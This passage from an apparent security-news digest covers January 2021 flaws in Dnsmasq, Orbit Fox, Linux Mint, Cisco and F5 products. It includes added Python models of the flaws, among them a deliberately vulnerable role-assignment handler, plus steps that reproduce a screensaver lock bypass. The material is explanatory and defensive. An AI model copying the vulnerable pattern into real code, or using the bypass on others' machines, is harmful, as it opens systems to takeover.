The most important of these is CVE-2021-21117, an insufficient policy enforcement issue in Cryptohome that was rated critical severity. Exploitation of the bug could result in arbitrary code execution in the context of the browser, the Multi-State Information Sharing and Analysis Center (MS-ISAC) notes in an advisory.

The issue was reported by Rory McNamara, who received a $30,000 bug bounty reward for the discovery.

A total of nine vulnerabilities rated high severity were reported by external researchers, with use-after-free being the most frequent bug type (six of the vulnerabilities). Two high-risk insufficient data validation flaws and one insufficient policy enforcement were also addressed.

Six of the ten medium-severity flaws reported externally were insufficient policy enforcement bugs, accompanied by two inappropriate implementations, one heap buffer overflow, and one incorrect security UI issue.

Chrome 88 also addresses six low-severity vulnerabilities reported by external researchers.

Google says it paid more than $80,000 in bug bounties to the reporting researchers, but the company hasn’t disclosed all of the reward amounts yet.

The latest stable version of Chrome is 88.0.4324.96 and is currently rolling out to Windows, Mac and Linux users.


A Set of Severe Flaws Affect Popular DNSMasq DNS Forwarder
20.1.2021  Vulnerebility  Thehackernews
Cybersecurity researchers have uncovered multiple vulnerabilities in Dnsmasq, a popular open-source software used for caching Domain Name System (DNS) responses, thereby potentially allowing an adversary to mount DNS cache poisoning attacks and remotely execute malicious code.

The seven flaws, collectively called "DNSpooq" by Israeli research firm JSOF, echo previously disclosed weaknesses in the DNS architecture, leaving Dnsmasq servers defenseless against a range of attacks.

"We found that Dnsmasq is vulnerable to DNS cache poisoning attack by an off-path attacker (i.e., an attacker that does not observe the communication between the DNS forwarder and the DNS server)," the researchers noted in a report published today.

"Our attack allows for poisoning of multiple domain names at once, and is a result of several vulnerabilities found. The attack can be completed successfully under seconds or few minutes, and have no special requirements. We also found that many instances of Dnsmasq are misconfigured to listen on the WAN interface, making the attack possible directly from the Internet."

Dnsmasq, short for DNS masquerade, is a lightweight software with DNS forwarding capabilities used for locally caching DNS records, thus reducing the load on upstream nameservers and improving performance.

As of September 2020, there were about 1 million vulnerable Dnsmasq instances, JSOF found, with the software included in Android smartphones and millions of routers and other networking devices from Cisco, Aruba, Technicolor, Redhat, Siemens, Ubiquiti, and Comcast.

Revisiting Kaminsky Attack and SAD DNS
The concept of DNS cache poisoning is not new.

In 2008, security researcher Dan Kaminsky presented his findings of a widespread and critical DNS vulnerability that allowed attackers to launch cache poisoning attacks against most nameservers.

It exploited a fundamental design flaw in DNS — there can be only 65,536 possible transaction IDs (TXIDs) — to flood the DNS server with forged responses, which is then cached and leveraged to route users to fraudulent websites.

The transaction IDs were introduced as a mechanism to thwart the possibility that an authoritative nameserver could be impersonated to craft malicious responses. With this new setup, DNS resolvers attached a 16-bit ID to their requests to the nameservers, which would then send back a response with the same ID.

But the limitation in transaction IDs meant that whenever a recursive resolver queries the authoritative nameserver for a given domain (e.g., www.google.com), an attacker could flood the resolver with DNS responses for some or all of the 65 thousand or so possible transaction IDs.

If the malicious answer with the right transaction ID from the attacker arrives before the response from the authoritative server, then the DNS cache would be effectively poisoned, returning the attacker's chosen IP address instead of the legitimate address for as long as the DNS response was valid.

The attack banked on the fact that the entire lookup process is unauthenticated, meaning there is no way to verify the identity of the authoritative server, and that DNS requests and responses use UDP (User Datagram Protocol) instead of TCP, thereby making it easy to spoof the replies.

To counter the problem, a randomized UDP port was used as a second identifier along with the transaction ID, as opposed to just using port 53 for DNS lookups and responses, thus raising the entropy in the order of billions and making it practically infeasible for attackers to guess the correct combination of the source port and the transaction ID.

Although the effectiveness of cache poisoning attacks has taken a hit due to the aforementioned source port randomization (SPR) and protocols such as DNSSEC (Domain Name System Security Extensions), researchers last November found a "novel" side-channel to defeat the randomization by using ICMP rate limits as a side-channel to reveal whether a given port is open or not.

The attacks — named "SAD DNS" or Side-channel AttackeD DNS — involve sending a burst of spoofed UDP packets to a DNS resolver, each sent over a different port, and subsequently using ICMP "Port Unreachable" messages (or lack thereof) as an indicator to discern if the rate limit has been met and eventually narrow down the exact source port from which the request originated.

Mount Multi-Staged Attacks That Allow Device Takeover
Interestingly, the DNS cache poisoning attacks detailed by JSOF bear similarities to SAD DNS in that the three vulnerabilities (CVE-2020-25684, CVE-2020-25685, and CVE-2020-25686) aim to reduce the entropy of the Transaction IDs and source port that are required for a response to be accepted.

Specifically, the researchers noted that despite Dnsmasq's support for SPR, it "multiplexes multiple TXIDs on top of one port and does not link each port to specifics TXIDs," and that the CRC32 algorithm used for preventing DNS spoofing can be trivially defeated, leading to a scenario where "the attacker needs to get any one of the ports right and any one of the TXIDs right."

Dnsmasq versions 2.78 to 2.82 were all found to be affected by the three flaws.
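The design difference described above, modelled as an added example (not Dnsmasq's or JSOF's code): a resolver that binds each outstanding query to its own (source port, TXID) pair accepts exactly one pair per query, whereas one that shares a pool of open ports across queries and does not tie TXIDs to ports accepts any open port combined with any outstanding TXID. The pool size of 64 ports is an assumed parameter of the model.

```python
import random

TXID_SPACE = 65536                  # 16-bit transaction ID
EPHEMERAL_PORTS = range(1024, 65536)


class LinkedResolver:
    """Each outstanding query is bound to its own (source port, TXID) pair.

    A reply is accepted only if both values match the query it answers, so the
    number of (port, TXID) pairs a forged reply could match equals the number
    of outstanding queries.
    """

    def __init__(self, rng: random.Random) -> None:
        self.rng = rng
        self.pending: dict[tuple[int, int], str] = {}

    def send(self, qname: str) -> tuple[int, int]:
        while True:
            key = (self.rng.choice(EPHEMERAL_PORTS), self.rng.randrange(TXID_SPACE))
            if key not in self.pending:          # keep pairs distinct
                self.pending[key] = qname
                return key

    def accepts(self, port: int, txid: int) -> bool:
        return (port, txid) in self.pending

    def accepted_pairs(self) -> int:
        return len(self.pending)


class MultiplexedResolver:
    """Model of the weakness the article attributes to Dnsmasq: a pool of open
    ports shared by all outstanding queries, with TXIDs not linked to a port.
    Any open port combined with any outstanding TXID is accepted."""

    def __init__(self, rng: random.Random, max_ports: int = 64) -> None:
        self.rng = rng
        self.max_ports = max_ports
        self.ports: list[int] = []
        self.txids: dict[int, str] = {}

    def send(self, qname: str) -> tuple[int, int]:
        if len(self.ports) < self.max_ports:     # open another port for the pool
            port = self.rng.choice(EPHEMERAL_PORTS)
            while port in self.ports:
                port = self.rng.choice(EPHEMERAL_PORTS)
            self.ports.append(port)
        port = self.rng.choice(self.ports)       # query goes out on any pool port
        txid = self.rng.randrange(TXID_SPACE)
        while txid in self.txids:
            txid = self.rng.randrange(TXID_SPACE)
        self.txids[txid] = qname
        return port, txid

    def accepts(self, port: int, txid: int) -> bool:
        return port in self.ports and txid in self.txids

    def accepted_pairs(self) -> int:
        return len(self.ports) * len(self.txids)


def compare(n_queries: int, seed: int = 1) -> dict[str, float]:
    """Issue n_queries concurrent lookups on both models and report how many
    (port, TXID) pairs each accepts, plus the acceptance probability of one
    forged reply drawn uniformly from the whole (port, TXID) space."""
    linked = LinkedResolver(random.Random(seed))
    shared = MultiplexedResolver(random.Random(seed))
    for i in range(n_queries):
        linked.send(f"host{i}.example")
        shared.send(f"host{i}.example")
    space = len(EPHEMERAL_PORTS) * TXID_SPACE
    return {
        "linked_pairs": linked.accepted_pairs(),
        "multiplexed_pairs": shared.accepted_pairs(),
        "linked_p": linked.accepted_pairs() / space,
        "multiplexed_p": shared.accepted_pairs() / space,
    }


if __name__ == "__main__":
    for k, v in compare(64).items():
        print(f"{k:>18}: {v}")
```

With 64 concurrent queries the multiplexed model accepts 64 × 64 = 4096 pairs against 64 for the linked model, which is the entropy loss the three CVEs exploit and a useful property to check when reviewing any forwarder's source-port handling.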

The other four vulnerabilities disclosed by JSOF are heap-based buffer overflows, which can lead to potential remote code execution on the vulnerable device.

"These vulnerabilities, in and of themselves, would have limited risk, but become especially powerful since they can be combined with the cache-poisoning vulnerabilities to produce a potent attack, allowing for remote code execution," the researchers said.

Even worse, these weaknesses can be chained with other network attacks such as SAD DNS and NAT Slipstreaming to mount multi-staged attacks against Dnsmasq resolvers listening on port 53. Even those that are configured to only listen to connections received from within an internal network are at risk if the malicious code gets transmitted via web browsers or other infected devices on the same network.

Besides rendering them susceptible to cache poisoning, the attacks can also permit a bad actor to take control over routers and networking equipment, stage distributed denial-of-service (DDoS) attacks by subverting traffic to a malicious domain, and even prevent users from accessing legitimate sites (reverse DDoS).

The researchers also raised the possibility of a "wormable attack" wherein mobile devices connected to a network that uses an infected Dnsmasq server receive a bad DNS record and are then used to infect a new network upon connecting to it.

Update Dnsmasq to 2.83
It's highly recommended that vendors update their Dnsmasq software to the latest version (2.83 or above) that will be released later today in order to mitigate the risk.

As workarounds, researchers suggest lowering the maximum number of queries allowed to be forwarded, as well as relying on DNS-over-HTTPS (DoH) or DNS-over-TLS (DoT) to connect to the upstream server.

"DNS is an Internet-critical protocol whose security greatly affect[s] the security of Internet users," the researchers concluded. "These issues put networking devices at risk of compromise and affect millions of Internet users, which can suffer from the cache poisoning attack presented.

"This highlight[s] the importance of DNS security in general and the security of DNS forwarders in particular. It also highlights the need to expedite the deployment of DNS security measures such as DNSSEC, DNS transport security, and DNS cookies."


Critical flaws in Orbit Fox WordPress plugin allow site takeover
18.1.2021 
Vulnerebility  Securityaffairs

Two vulnerabilities in the Orbit Fox WordPress plugin, a privilege-escalation issue and a stored XSS bug, can allow site takeover.
Security experts from Wordfence have discovered two security vulnerabilities in the Orbit Fox WordPress plugin. The flaws are a privilege-escalation vulnerability and a stored XSS bug that impacts over 40,000 installs.

The Orbit Fox plugin allows site administrators to add features such as registration forms and widgets; it has been installed on 400,000+ sites.

The plugin was developed by ThemeIsle; it is designed to enhance the Elementor, Beaver Builder, and Gutenberg editors with additional features.

The two vulnerabilities can be exploited by attackers to inject malicious code into websites running a vulnerable version of the plugin and take them over.

“One of these flaws made it possible for attackers with contributor level access or above to escalate their privileges to those of an administrator and potentially take over a WordPress site. The other flaw made it possible for attackers with contributor or author level access to inject potentially malicious JavaScript into posts.” reads the post published by Wordfence. “These types of malicious scripts can be used to redirect visitors to malvertising sites or create new administrative users, amongst many other actions.”
The authenticated privilege-escalation flaw has been rated as critical and has received a CVSS bug-severity score of 9.9. Authenticated attackers with contributor level access or above can escalate their privileges to administrator and potentially take over a website.

The authenticated stored cross-site scripting (XSS) issue allows attackers with contributor or author level access to inject JavaScript into posts. An attacker could exploit this flaw to conduct multiple malicious actions, such as malvertising attacks. The flaw, rated as medium severity, has received a CVSS score of 6.4.

The Orbit Fox plugin includes a registration widget that can be used to create a registration form with customizable fields when using the Elementor and Beaver Builder page builder plugins. Upon creating the registration form, the plugin provides the ability to set a default role to be used whenever a user registers using the form.

“Lower-level users like contributors, authors, and editors were not shown the option to set the default user role from the editor. However, we found that they could still modify the default user role by crafting a request with the appropriate parameter,” Wordfence continues. “The plugin provided client-side protection to prevent the role selector from being shown to lower-level users while adding a registration form. Unfortunately, there were no server-side protections or validation to verify that an authorized user was actually setting the default user role in a request.”

Experts pointed out that the lack of server-side validation in Orbit Fox allows lower-level users to set their role to that of an administrator upon successful registration.

“To exploit this flaw, user registration would need to be enabled and the site would need to be running the Elementor or Beaver Builder plugins,” continues Wordfence. “A site with user registration disabled or neither of these plugins installed would not be affected by this vulnerability.”
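The missing server-side check, modelled in Python as an added example (not the plugin's code): the vulnerable handler applies whatever default_role the request carries, while the hardened one honours the parameter only when the submitting user holds a capability that permits assigning roles (promote_users is used here as the assumed capability name) and the role is on an allowlist. The User, RegistrationForm and parameter names are constructed for the illustration.

```python
from dataclasses import dataclass, field

# Roles a registration form is ever allowed to hand out, lowest privilege first.
ASSIGNABLE_ROLES = ("subscriber", "contributor")
DEFAULT_ROLE = "subscriber"


@dataclass
class User:
    name: str
    role: str
    capabilities: set[str] = field(default_factory=set)


@dataclass
class RegistrationForm:
    owner: str
    default_role: str = DEFAULT_ROLE


class AuthorizationError(PermissionError):
    pass


def save_form_vulnerable(editor: User, params: dict[str, str]) -> RegistrationForm:
    """Mirrors the flaw: the role selector is hidden from lower-level users in
    the client, but the server applies any 'default_role' present in the
    request without checking who sent it."""
    form = RegistrationForm(owner=editor.name)
    if "default_role" in params:
        form.default_role = params["default_role"]   # trusted as-is
    return form


def save_form_hardened(editor: User, params: dict[str, str]) -> RegistrationForm:
    """Server-side enforcement: the parameter is honoured only when the editor
    may assign roles, and only for roles on the allowlist."""
    form = RegistrationForm(owner=editor.name)
    requested = params.get("default_role")
    if requested is None:
        return form
    if "promote_users" not in editor.capabilities:
        raise AuthorizationError(f"{editor.name} may not set a default role")
    if requested not in ASSIGNABLE_ROLES:
        raise ValueError(f"role {requested!r} is not assignable by registration")
    form.default_role = requested
    return form


def register_via_form(form: RegistrationForm, username: str) -> User:
    """A visitor who registers through the form receives its default role."""
    return User(name=username, role=form.default_role)


if __name__ == "__main__":
    contributor = User("carol", "contributor")
    tampered = {"default_role": "administrator"}
    print(register_via_form(save_form_vulnerable(contributor, tampered), "m").role)
    try:
        save_form_hardened(contributor, tampered)
    except AuthorizationError as exc:
        print("rejected:", exc)
```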

The stored XSS vulnerability allowed lower-level users to add malicious JavaScript to posts that would execute in the browser whenever a user navigated to that page.

The two vulnerabilities have been addressed with the release of version 2.10.3.

Vulnerabilities in WordPress plugins are very dangerous and could allow attackers to carry out attacks on a large scale. In December, the development team behind the Contact Form 7 WordPress plugin disclosed an unrestricted file upload vulnerability; the plugin has over 5 million active installs. The issue can be exploited to upload a file that can be executed as a script file on the underlying server.

In November threat actors were observed actively exploiting a zero-day vulnerability in the popular Easy WP SMTP WordPress plugin installed on more than 500,000 sites.

In the same period hackers were actively exploiting a critical remote code execution vulnerability in the File Manager plugin, over 300,000 WordPress sites were potentially exposed at the time of the discovery.


Two kids found a screensaver bypass in Linux Mint
17.1.2021 
Vulnerebility  Securityaffairs

The development team behind the Linux Mint distro has fixed a security flaw that could have allowed users to bypass the OS screensaver.
The maintainers of the Linux Mint project have addressed a security bug that could have allowed attackers to bypass the OS screensaver.

The curious aspect of this vulnerability is its discovery: it was found by two children who were playing on their dad’s computer.

The process is simple: the screensaver lock can be bypassed by crashing the screensaver and unlocking the desktop via the virtual keyboard.

In order to reproduce the bypass on a locked system, click on the virtual keyboard, then type on the real keyboard while also typing on the virtual keyboard, pressing as many keys as possible at the same time.
“A few weeks ago, my kids wanted to hack my linux desktop, so they typed and clicked everywhere, while I was standing behind them looking at them play… when the screensaver core dumped and they actually hacked their way in! wow, those little hackers…” states a bug report on GitHub.

“I thought it was a unique incident, but they managed to do it a second time. So I’d consider this issue… reproducible… by kids. I tried to recreate the crash on my own with no success, maybe because it required more than 4 little hands typing and using the mouse on the virtual keyboard. Maybe not the best bug report, but I’ve seen the screenlock crash twice already with my own eyes, so its pretty real. One last thing, after the desktop is unlocked, I can’t re-lock it again, the screensaver process is pretty dead and requires me to open a shell and run ‘cinnamon-screensaver’ manually to get it working.”
Linux Mint lead developer Clement Lefebvre confirmed that the bug resides in libcaribou, the on-screen keyboard (OSK) component that is part of the Cinnamon desktop environment used by Linux Mint.

“We’ll most likely patch libcaribou here” wrote Lefebvre. “We have two different issues:

In all versions of Cinnamon, the on-screen keyboard (launched from the menu) runs within the Cinnamon process and uses libcaribou. Pressing ē crashes Cinnamon.
In versions of Cinnamon 4.2 and higher, there’s a libcaribou OSK in the screensaver. Pressing ē there crashes the screensaver.”
The vulnerability is triggered when users press the “ē” key on the on-screen keyboard, which crashes the Cinnamon desktop process. If the on-screen keyboard is opened from the screensaver, the bug crashes the screensaver, allowing users to access the desktop.

The issue was introduced in Linux Mint with the Xorg update that fixed the CVE-2020-25712 heap-buffer overflow in October. The bug affects all distributions running Cinnamon 4.2+ and any software using libcaribou.

The vulnerability was addressed with the release of a patch for Mint 19.x, Mint 20.x and LMDE 4.


Cisco says its RV routers will no longer receive updates
16.1.2021 
Vulnerebility  Securityaffairs

Cisco announced it will no longer release firmware updates to fix 74 vulnerabilities affecting its RV routers, which reached end-of-life (EOL).
Cisco will no longer release firmware updates to address 74 vulnerabilities affecting some of its RV routers that reached end-of-life (EOL).

The vendor will not release updates for RV110W, RV130, RV130W, and RV215W devices, which reached EOL in 2017 and 2018; Cisco provided paid support until December 1, 2020.

The list of flaws affecting the devices includes RCEs, DoS issues, command injection vulnerabilities and XSS bugs.

Below are the advisories published by the IT giant:

Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers Management Interface Remote Command Execution and Denial of Service Vulnerabilities;
Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers Management Interface Command Injection Vulnerabilities;
Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers Management Interface Stored Cross-Site Scripting Vulnerabilities;
“Cisco has not released and will not release software updates to address the vulnerabilities described in this advisory.” reads the advisory. “The Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers have entered the end-of-life process. Customers are advised to refer to the end-of-life notices for these products: End-of-Sale and End-of-Life Announcement for the Cisco Small Business RV Series Routers (selected models).”

In order to exploit the flaws, the attackers need to have credentials for the device.

The company is encouraging its customers to migrate to the Cisco Small Business RV132W, RV160, or RV160W Routers.

Cisco is not aware of attacks exploiting the vulnerabilities in the above advisories; it also noted that the flaws are not trivially exploitable, since valid device credentials are required.

“The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerabilities described in this advisory.” concludes Cisco.


Microsoft Reminds Organizations of Upcoming Phase in Patching Zerologon Vulnerability
16.1.2021 
Vulnerebility  Securityweek

Microsoft this week published a reminder for organizations that a February 9 security update will kick off the second phase of patching for the Zerologon vulnerability.

Tracked as CVE-2020-1472 and addressed on August 2020 Patch Tuesday, the critical vulnerability was identified in the Microsoft Windows Netlogon Remote Protocol (MS-NRPC) and can be abused to compromise Active Directory domain controllers and gain admin access.

Exploitable by unauthenticated attackers able to run a specially crafted application on a device on the network, the vulnerability came into the spotlight in September, after the Department of Homeland Security (DHS) told federal agencies to immediately apply patches for it.

Attacks targeting the vulnerability were observed soon after, and Microsoft issued guidance on how organizations can secure systems affected by the bug. Attacks targeting Zerologon, however, continued.

Microsoft told customers that the patching for this vulnerability would be performed in two stages: the deployment of the August 11 patches, and an enforcement phase set to start on February 9, 2021.

Now, the company reminds organizations of the upcoming transition into the enforcement stage, which will kick off on February 2021 Patch Tuesday.

“We are reminding our customers that beginning with the February 9, 2021 Security Update release we will be enabling Domain Controller enforcement mode by default. This will block vulnerable connections from non-compliant devices,” Microsoft notes.

With the DC enforcement mode enabled, all Windows and non-Windows devices will have to use secure RPC with Netlogon secure channel. However, customers will have the option to add exceptions for non-compliant devices, even if that would render their accounts vulnerable.

In preparation for the enforcement mode phase, organizations should apply the available patch to all domain controllers and should identify and resolve non-compliant devices to ensure they won’t make vulnerable connections.

They can also enable the Domain Controller enforcement mode in their environments prior to the February 9 update.
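The preparation step above, identifying devices that still make vulnerable Netlogon connections, is normally done from the domain controllers' System event log: Microsoft documented event IDs 5827 and 5828 for vulnerable connections that were denied, 5829 for vulnerable connections that were allowed only because enforcement mode is off, and 5830 and 5831 for connections allowed by an explicit policy exception. The following is an added illustration, not Microsoft's tooling: it reads a CSV export of such events and lists the accounts that enforcement mode will start refusing. The CSV column names and the sample rows are constructed for the example.

```python
"""Triage Netlogon secure-channel events ahead of the Zerologon enforcement phase.

Added illustration (not Microsoft's tooling). It reads a CSV export of Netlogon
events (IDs 5827-5831 from a domain controller's System log) and lists the
accounts that enforcement mode will begin to refuse.
"""
import csv
import io
from collections import Counter
from dataclasses import dataclass

# Event IDs Microsoft documented for CVE-2020-1472 deployment-phase monitoring.
DENIED_IDS = {5827, 5828}     # vulnerable connection already refused (machine / trust account)
ALLOWED_IDS = {5829}          # vulnerable connection allowed only because enforcement is off
EXCEPTED_IDS = {5830, 5831}   # allowed by the explicit "allow vulnerable" policy exception
TRACKED_IDS = DENIED_IDS | ALLOWED_IDS | EXCEPTED_IDS


@dataclass(frozen=True)
class NetlogonEvent:
    event_id: int
    domain: str
    account: str     # machine or trust account SamAccountName, e.g. "OLDNAS$"
    os_name: str


# Constructed export; the column names are an assumption, not the Event Viewer's exact schema.
SAMPLE_CSV = """EventID,Domain,Account,OS
5829,CORP,OLDNAS$,Linux
5829,CORP,OLDNAS$,Linux
5829,CORP,PRINTER01$,Unknown
5830,CORP,LEGACYAPP$,Windows Server 2008
5827,CORP,WS-0042$,Windows 10
4624,CORP,WS-0042$,Windows 10
"""


def parse_events(text: str) -> list[NetlogonEvent]:
    """Parse the CSV export and keep only the Netlogon events this triage cares about."""
    events = []
    for row in csv.DictReader(io.StringIO(text)):
        event_id = int(row["EventID"])
        if event_id in TRACKED_IDS:
            events.append(NetlogonEvent(event_id, row["Domain"], row["Account"], row["OS"]))
    return events


def triage(events: list[NetlogonEvent]) -> dict:
    """Group accounts by what Domain Controller enforcement mode will do to them."""
    will_be_blocked = Counter()          # (domain, account) -> number of 5829 events
    excepted, already_denied = set(), set()
    for ev in events:
        key = (ev.domain, ev.account)
        if ev.event_id in ALLOWED_IDS:
            will_be_blocked[key] += 1
        elif ev.event_id in EXCEPTED_IDS:
            excepted.add(key)
        else:
            already_denied.add(key)
    return {
        "will_be_blocked": dict(will_be_blocked),
        "excepted": excepted,
        "already_denied": already_denied,
    }


def report(text: str) -> list[str]:
    """Human-readable action list, most urgent first."""
    summary = triage(parse_events(text))
    lines = []
    for (domain, account), n in sorted(summary["will_be_blocked"].items()):
        lines.append(f"FIX BEFORE 2021-02-09: {domain}\\{account} "
                     f"({n} vulnerable connection(s) allowed, event 5829)")
    for domain, account in sorted(summary["excepted"]):
        lines.append(f"REVIEW EXCEPTION: {domain}\\{account} (allowed by policy, event 5830/5831)")
    for domain, account in sorted(summary["already_denied"]):
        lines.append(f"ALREADY DENIED: {domain}\\{account} (event 5827/5828)")
    return lines


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_CSV)))
```

Accounts in the first group are the ones whose owners must be patched or replaced before the February 9 update; accounts in the second group are the exceptions the text warns about, which remain vulnerable by the administrator's own choice and deserve a periodic review.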

In a report covering the 2020 threat landscape, Tenable considers Zerologon the top vulnerability of last year, out of 18,358 reported CVEs.


Expert discovered a DoS vulnerability in F5 BIG-IP systems
15.1.2021 
Vulnerebility  Securityaffairs

A security researcher discovered a flaw in the F5 BIG-IP product that can be exploited to conduct denial-of-service (DoS) attacks.
The security expert Nikita Abramov from Positive Technologies discovered a DoS vulnerability, tracked as CVE-2020-27716, that affects certain versions of F5 BIG-IP Access Policy Manager (APM).

The F5 BIG-IP Access Policy Manager is a secure, flexible, high-performance access management proxy solution that delivers unified global access control for your users, devices, applications, and application programming interfaces (APIs).

The vulnerability resides in the Traffic Management Microkernel (TMM) component which processes all load-balanced traffic on BIG-IP devices.

“When a BIG-IP APM virtual server processes traffic of an undisclosed nature, the Traffic Management Microkernel (TMM) stops responding and restarts. (CVE-2020-27716)” reads the advisory published by F5. “Traffic processing is disrupted while TMM restarts. If the affected BIG-IP system is configured as part of a device group, the system triggers a failover to the peer device.”

An attacker could trigger the flaw by simply sending a specially crafted HTTP request to the server hosting the BIG-IP configuration utility, and that would be enough to block access to the controller for a while (until it automatically restarts).

“Vulnerabilities like this one are quite commonly found in code. They can occur for different reasons, for example unconsciously neglected by developers or due to insufficient additional checks being carried out. I discovered this vulnerability during binary analysis. Flaws like this one can be detected using non-standard requests and by analyzing logic and logical inconsistencies.” explains Nikita Abramov, researcher at Positive Technologies.

The flaw impacts versions 14.x and 15.x; the vendor has already released security updates that address it.

In June, F5 Networks addressed another flaw, tracked as CVE-2020-5902, which resides in undisclosed pages of the Traffic Management User Interface (TMUI) of the BIG-IP product.

The vulnerability could be exploited by attackers to gain access to the TMUI component to execute arbitrary system commands, disable services, execute arbitrary Java code, create or delete files, and potentially take over the BIG-IP device.

The CVE-2020-5902 vulnerability received a CVSS score of 10, which means that it is quite easy to exploit. The issue could be exploited by sending a specifically crafted HTTP request to the server hosting the Traffic Management User Interface (TMUI) utility for BIG-IP configuration.

Immediately after the public disclosure of the flaw, several proof-of-concept (PoC) exploits were released, some of them very easy to use.

A few days after the disclosure of the vulnerability in the F5 Networks BIG-IP product, threat actors started exploiting it in attacks in the wild. Threat actors exploited the CVE-2020-5902 flaw to obtain passwords, create web shells, and infect systems with various malware.


Cisco addresses a High-severity flaw in CMX Software
15.1.2021 
Vulnerebility  Securityaffairs

Cisco addressed tens of high-severity flaws, including some flaws in the AnyConnect Secure Mobility Client and in its small business routers.
This week Cisco released security updates to address 67 high-severity vulnerabilities, including issues affecting Cisco’s AnyConnect Secure Mobility Client and small business routers (i.e. Cisco RV110W, RV130, RV130W, and RV215W).

One of the flaws fixed by the tech giant, tracked as CVE-2021-1144, is a high-severity vulnerability that affects Cisco Connected Mobile Experiences (CMX), a smart Wi-Fi solution that uses the Cisco wireless infrastructure to provide location services and location analytics for consumers’ mobile devices. CMX supports an organization’s Wi-Fi and mobile engagement and allows it to deliver content directly to smartphones and tablets, personalized to visitors’ preferences and relevant to their real-time indoor locations.

The vulnerability, which received a CVSS score of 8.8 out of 10, could be exploited by a remote authenticated attacker to change the password for any account user on affected systems.
“A vulnerability in Cisco Connected Mobile Experiences (CMX) could allow a remote, authenticated attacker without administrative privileges to alter the password of any user on an affected system.” reads the advisory published by Cisco.

“The vulnerability is due to incorrect handling of authorization checks for changing a password. An authenticated attacker without administrative privileges could exploit this vulnerability by sending a modified HTTP request to an affected device. A successful exploit could allow the attacker to alter the passwords of any user on the system, including an administrative user, and then impersonate that user.”
The flaw affects Cisco CMX releases 10.6.0, 10.6.1, and 10.6.2.

The vendor addressed the flaw with software release 10.6.3; it also informed customers that there are no workarounds that address this issue.

Cisco also addressed a DLL Injection flaw, tracked as CVE-2021-1237, in Cisco AnyConnect Secure Mobility Client for Windows.

The flaw received a CVSS score of 7.8; attackers could exploit it to conduct a dynamic-link library (DLL) injection attack.
“A vulnerability in the Network Access Manager and Web Security Agent components of Cisco AnyConnect Secure Mobility Client for Windows could allow an authenticated, local attacker to perform a DLL injection attack. To exploit this vulnerability, the attacker would need to have valid credentials on the Windows system.” reads the advisory.

“The vulnerability is due to insufficient validation of resources that are loaded by the application at run time. An attacker could exploit this vulnerability by inserting a configuration file in a specific path in the system which, in turn, causes a malicious DLL file to be loaded when the application starts. A successful exploit could allow the attacker to execute arbitrary code on the affected machine with SYSTEM privileges.”

Cisco also fixed a series of flaws in the Small Business RV110W, RV130, RV130W, and RV215W Routers Management Interface that could lead to remote command execution and denial-of-service attacks.


Vulnerability Exposes F5 BIG-IP Systems to Remote DoS Attacks
15.1.2021 
Vulnerebility  Securityweek

A vulnerability discovered by a researcher in a BIG-IP product from F5 Networks can be exploited to launch remote denial-of-service (DoS) attacks.

The security flaw was discovered by Nikita Abramov, a researcher at cybersecurity solutions provider Positive Technologies, and it impacts certain versions of BIG-IP Access Policy Manager (APM), a secure access solution that simplifies and centralizes access to applications, APIs and data.

According to F5 Networks, the vulnerability is related to a component named Traffic Management Microkernel (TMM), which processes all load-balanced traffic on BIG-IP systems.

“When a BIG-IP APM virtual server processes traffic of an undisclosed nature, the Traffic Management Microkernel (TMM) stops responding and restarts,” the vendor explained in an advisory published in mid-December. “Traffic processing is disrupted while TMM restarts. If the affected BIG-IP system is configured as part of a device group, the system triggers a failover to the peer device.”

Abramov noted that exploiting this vulnerability does not require any tools — the attacker simply has to send a specially crafted HTTP request to the server hosting the BIG-IP configuration utility, which results in access to the system being blocked “for a while (until it automatically restarts).”

F5 said in its advisory that the vulnerability, tracked as CVE-2020-27716 with a severity rating of high, only impacts versions 14.x and 15.x. Updates that patch the flaw in both branches are available.

Last year, Positive Technologies informed F5 of a critical BIG-IP vulnerability that ended up being exploited in the wild, including by profit-driven cybercriminals and state-sponsored cyberspies.


Vulnerabilities Can Allow Hackers to Create Backdoors in Comtrol Industrial Gateways
15.1.2021 
Vulnerebility  Securityweek

Several vulnerabilities have been identified in Pepperl+Fuchs Comtrol IO-Link Master industrial gateways, including flaws that researchers claim can be exploited to gain root access to a device and create backdoors.

Vulnerabilities found in Pepperl+Fuchs Comtrol industrial gateways

A researcher at Austria-based cybersecurity consultancy SEC Consult discovered five types of vulnerabilities in Pepperl+Fuchs Comtrol industrial products, including cross-site request forgery (CSRF), reflected cross-site scripting (XSS), blind command injection, and denial-of-service (DoS) issues. The impacted products were found to leverage outdated versions of third-party components that were known to have vulnerabilities, including PHP, OpenSSL, BusyBox, Linux kernel, and lighttpd.

In an advisory published on January 4, Pepperl+Fuchs said the vulnerabilities can allow remote attackers to gain access to the targeted device, execute “any program,” and obtain information.

Johannes Greil, principal security consultant and head of the SEC Consult Vulnerability Lab, told SecurityWeek that if an attacker can gain access to one of the affected Comtrol devices — for example, by using an XSS attack or password guessing — they may be able to execute commands on the device with root privileges and implement persistent backdoors.

IO-Link is an industrial communications protocol used for digital sensors and actuators. Pepperl+Fuchs says its IO-Link Master product line “combines the benefits of the IO-Link standard with the EtherNet/IP and Modbus TCP protocols. The IO-Link Master effectively shields the PLC programmers from the IO-Link complexities by handling those complexities itself.”

The vendor patched the flaws discovered by SEC Consult several months after being informed of their existence. The company said a dozen IO-Link Master products are impacted and urged customers to update the U-Boot bootloader, the system image, and the application base to prevent exploitation.


Over 70 Vulnerabilities Will Remain Unpatched in EOL Cisco Routers
15.1.2021 
Vulnerebility  Securityweek

Cisco this week announced that it does not plan on addressing tens of vulnerabilities affecting some of its small business routers.

A total of 68 high-severity flaws were identified in Cisco’s Small Business RV110W, RV130, RV130W, and RV215W routers, but the company says patches won’t be released, because these devices have reached end-of-life (EOL). The last day for software maintenance releases and bug fixes was December 1, 2020.

The security bugs exist because user-supplied input to the web-based management interface of the affected router series is not properly validated, thus allowing an attacker to send crafted HTTP requests to exploit these issues.

An attacker able to successfully exploit these vulnerabilities would be able to execute arbitrary code with root privileges on the underlying operating system. A mitigating factor, however, is that valid administrator credentials are required for exploitation.

In an advisory detailing 63 of these flaws, the tech giant explains that an attacker could also abuse them to restart the affected devices, leading to a denial-of-service (DoS) condition.

